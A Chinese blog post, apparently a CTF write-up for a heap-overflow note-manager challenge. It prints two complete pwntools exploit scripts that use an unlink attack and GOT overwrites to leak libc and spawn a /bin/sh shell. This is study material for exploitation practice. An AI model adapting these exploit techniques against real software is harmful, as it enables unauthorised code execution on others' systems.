w4-1

最新推荐文章于 2019-07-11 15:45:10 发布
最新推荐文章于 2019-07-11 15:45:10 发布
阅读量601 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunrise19960110/article/details/90614117
版权

漏洞:create和edit都没有检查长度,产生堆溢出。
基本功能:

  1. create notes
  2. display notes
  3. delete notes
  4. modify notes
  5. exit

交互

def create(size,content):
	p.recvuntil("5. exit\n")
	p.sendline("1")
	p.recvuntil("Please enter the size of note : ")
	p.sendline(str(size))
	p.recvuntil("Please enter the note : ")
	p.sendline(content)
def display(index):
	p.recvuntil("5. exit\n")
	p.sendline("2")
	p.recvuntil("Please input index : ")
	p.sendline(str(index))
	p.recvuntil("Notes are : ")
	return p.recvline()
def delete(index):
	p.recvuntil("5. exit\n")
	p.sendline("3")
	p.recvuntil("Please input index : ")
	p.sendline(str(index))
def modify(index,content):
	p.recvuntil("5. exit\n")
	p.sendline("4")
	p.recvuntil("Please input index : ")
	p.sendline(str(index))
	p.recvuntil("Please enter the note : ")
	p.sendline(content)

exp1:只使用create和modify功能
1、构造unlink
2、用got地址替换,设定free、puts、atoi
3、改free(ptr)为puts(got_puts)
4、改atoi(content)为system(’/bin/sh’)

create(200,"aa")#0
create(200,"bb")#1
create(200,"cc")#2
create(200,"dd")#3
delete(0)
'''
通过堆0的溢出,改写堆1和堆2的内容
堆1		(presize=0,size=0xd1)
fake_1	(presize=0,size=0xb1)
fake_2	(fd=p-0x18,size=p-0x10)		p指向的fake_1的地址
……
fake_3	(presize=0xb0,size=0)		呼应fakesize
堆2		(presize=0xc0,size=0xd0)	标记前一个堆块未使用
过程:
1、释放堆2的时候,根据0xc0找到fake_1。
2、根据size0xb1往后找到fake_3会有检查,此处size设成0xc1也可以
3、unlink生效
'''
payload = "d"*192+p64(0)
payload += p64(0xd1)+p64(0)
payload += p64(0xb1)+p64(0x6020a0-0x18+16)+p64(0x6020a0-0x10+16)
payload += "d"*144+p64(0xb0)+p64(0)+p64(0xc0)+p64(0xd0)+p64(0)
create(200,payload)
delete(2)
# 任意修改got表
payload = p64(0)
payload+= p64(elf.got["free"])+p64(0xc8)
payload+= p64(elf.got["puts"])+p64(0xc8)
payload+= p64(elf.got["atoi"])+p64(0xc8)
modify(1,payload)
# 把free改成puts
modify(0,p32(elf.plt["puts"])+"\x00")
# puts(puts_addr)
delete(1)
puts_addr = p.recvuntil('\nDelete success!\n', drop=True).ljust(8, '\x00')
puts_addr = u64(puts_addr)
libc_base = puts_addr - libc.symbols['puts']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
system_addr = libc_base + libc.symbols['system']
log.success('libc base: ' + hex(libc_base))
log.success('/bin/sh addr: ' + hex(binsh_addr))
log.success('system addr: ' + hex(system_addr))
# 把atoi改成system
modify(2,p64(system_addr))
# system(binsh_addr)
p.send(p64(binsh_addr))
p.interactive()

exp2
1、用edit触发unlink
2、got地址替换,设定puts、atoi
3、用程序提供的功能泄露libc
4、改atoi(content)为system(’/bin/sh’)

add(129, 'a\n')
add(129, 'b\n')
# 触发unlink
bss = 0x6020a0
fd = bss - 0x18
bk = bss - 0x10
edit(0, p64(0)+p64(0x80)+p64(fd)+p64(bk)+'a'*0x60+p64(0x80)+p64(0x90)+'\n')
dele(1)
# unlink使得ptr处的指针变成ptr-0x18,所以填充0x18字节
puts = 0x602020
atoi = 0x602058
edit(0, 'a'*0x18+p64(puts)+p64(0x80)+p64(atoi)+'\n')
# 泄露libc
show(0)
libcbase = u64(io.recv(6)+'\x00\x00') - libc.symbols['puts']
print hex(libcbase)
# system('/bin/sh')
system = libcbase + libc.symbols['system']
edit(1, p64(system)+'\n')
io.recvuntil('exit\n')
io.sendline('/bin/sh\x00')
io.interactive()

反思:
1、unlink时不用在top trunk上添加一个间隔块。
2、应灵活使用程序本身提供的功能来提供方便。
相关资源:
https://gitee.com/sunrise1/CTF/blob/master/w4-1.zip

__sunrise__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
w4-1程序与脚本.zip
05-28
p.sendline("1") p.recvuntil("Please enter the size of note : ") p.sendline(str(size)) p.recvuntil("Please enter the note : ") p.sendline(content) def display(index): p.recvuntil("5. exit\n") p....
高性能网站建设之减少Http连接数
weixin_34235371的博客
12-10 84
关于CSS背景图合并工具,请大家参看随笔:Css背景图合并工具功能增强(V0.1) 在对大访问量网站进行性能优化时,其中有一点是尽量减少http连接数,道理很明了,减少了单个PV的http连接数,肯定可以增加单台服务器的用户负载数。 减少Http连接数的具体方法是减少没必要的iframe使用,合并js文件,css文件,和一种常见的方法,合并Css小背景图,合并Css小背景图这一点已经有很多大...
cannot be cast to javax.servletFilter
weixin_30326515的博客
07-11 480
java.lang.ClassCastException: org.springframework.web.filter.CharacterEncodingFilter cannot be cast to javax.servlet.Filter at org.apache.catalina.core.ApplicationFilterConfig.getFilter(ApplicationFil...
1.获取财经新闻文本-Python3爬虫
希尔芬酱的博客
06-23 6253
本科毕业论文项目:《基于文本数据挖掘技术的内幕交易识别模型》的相关环节代码目录如下,已经全部更新,欢迎品尝: 1.获取财经新闻文本-Python3爬虫2.新闻情绪的量化-文本信息处理3.内幕交易识别模型的构建-机器学习 ——————————-分割线—————————— 这是我第一次使用python所涉及到的小项目,目的是爬取金融界上的所有财经新闻的文本信息,时间跨度为2010-2013年...
POJ 1694 An Old Stone Game
weixin_30405421的博客
07-29 74
题目: Description There is an old stone game, played on an arbitrary general tree T. The goal is to put one stone on the root of T observing the following rules: At the beginning of the game, the playe...
Python字符错误,一个特殊的字符?(%E2%80%8B)
热门推荐
wly
02-18 1万+
Left​​​​​​​​​​Right 把上面的两个单词拷贝下来,粘贴到一个文本编辑器中,比如txt文件。尝试在字符串中移动光标,会发现在t和R之间要移动3次才能移动过去,也就是说,其实那儿有一个特殊的字符,它没有宽度,让人误以为是什么也没有,但是如果编码一下会发现确实是有东西的: encodeURI():%E2%80%8B感觉能弄来做点有意思的事。
w4-学生.zip
09-19
【标题】"w4-学生.zip"所对应的可能是一个与教育、学习或课程相关的压缩文件。在IT领域,这样的文件通常包含一系列与教学材料、作业、项目或编程练习相关的资源。"w4"可能指的是第四周的学习内容,这在很多在线课程...
W4-60c型挖掘机整机分解程序研究
06-29
针对我国工程机械维修人员对大修机械的盲目、随意拆卸问题,经数十次的分解试验,总结出了W4-60c型挖掘机整机分解程序,解决了该机型无实用整机分解程序这一难题,从而达到提高工程机械维修质量的目地。
GA-W4-Trulia-Project
02-19
GA-W3- Trulia实验室项目任务是按照模型jpg所示构建页面。... 此实验工作的最后一步是根据窗口宽度添加响应式设计,将布局从3列更改为2列和1列。去做通过使用CSS position属性,改进列表上角标签(新的/出售的)的
arts106-w4-probuilder-FormulaNewts:GitHub Classroom创建的arts106-w4-probuilder-FormulaNewts
02-14
2020年-ProBuilder-Base
illustrator学习
邹邹s的博客
05-12 1006
01.软件基本操作 矢量图
JQuery学习(4-1)
小知识折射大智慧
11-06 1735
设置表单控件,主要包括‘验证邮箱’,‘判断输入是否为空’,‘设置tabindex属性’
【Unity--头顶UI 人物头顶UI】特别简单的实现人物头顶UI显示跟随
FransicZhang的博客
01-30 5910
 废话不多说 直接上代码  简单易懂 using UnityEngine; using System.Collections; public class HandUI : MonoBehaviour { public Transform Hand;//文字对应3D的物体 Vector3 screenPos; private void Update() { ...
Apache Qpid Broker的安全机制
ass201282的专栏
06-29 278
一、 Apache Qpid的安全机制简介   Apache Qpid提供多种安全机制,包括用户认证、规则定制的授权、消息加密和数字签名等。Apache Qpid使用SASL框架实现对用户身份的认证,使用访问控制列表(ACL)对角色用户的权限进行管理控制,消息加密和数字签名则是使用SSL安全套接字层来实现。 二、 用户认证   AMQP使用SASL(Simpl...
zzuli 2520: 大小接近的点对 //(主席树||树状数组)+离线
Rshs
04-15 327
2520: 大小接近的点对 时间限制: 1 Sec内存限制: 256 MB 提交: 173解决: 25 [提交] [状态] [讨论版] [命题人:外部导入] 题目描述 一天,Chika 对大小接近的点对产生了兴趣,她想搞明白这个问题的树上版本,你能帮助她吗?Chika 会给 你一棵有根树,这棵树有 n 个结点,被编号为 1 n,1 号结点是根。每个点有一个权值,i 号结点的权值为 ...
ASIHTTPRequest类库简介及使用
xiekunmiao的专栏
02-23 248
ASIHTTPRequest类库简介和使用说明使用iOS SDK中的HTTP网络请求API,相当的复杂,调用很繁琐,ASIHTTPRequest就是一个对CFNetwork API进行了封装,并且使用起来非常简单的一套API,用Objective-C编写,可以很好的应用在Mac OS X系统和iOS平台的应用程序中。ASIHTTPRequest适用于基本的HTTP请求,和基于REST的服务之间的交
《Microsoft Sql server 2008 Internals》读书笔记--第十一章DBCC Internals(4)
dfdfadsf3443的博客
07-31 132
《Microsoft Sql server 2008 Internals》读书笔记订阅地址: http://www.cnblogs.com/downmoon/category/230397.html/rss 《Microsoft Sql server 2008 Internals》索引目录: 《Microsoft Sql server 2008 Internal》读书笔记--目录索...
个人单页简历素材-简约单页01.docx
最新发布
07-23
【简历模板】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
嵌入式Linux之我行全集 详细uboot移植 免费下载.doc
07-23
嵌入式
-z*(z - 1)*(y*(c5 - r5)*(x - 1) - w4*x*(y - 1) + x*(c6 - r6)*(y - 1) + w4*(x - 1)*(y - 1) - (c7 - r7)*(x - 1)*(y - 1) + w4*x*y - x*y*(c5 - r5))对z求一阶导,并对结果化简
06-01
$w4*x - c6*x*y + r6*x*y + (c7-r7)*x*z*y - w4*z + w4*y - c5*x*y*z + r5*x*y*z + (c7-r7)*x*z - w4*(y-1) + (c7-r7)*(y-1) + y*(c5-r5)*z - y*(c5-r5) - x*(c6-r6)*z + x*(c6-r6) + (c7-r7)*(x-1)*y - (c7-r7)*(x-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值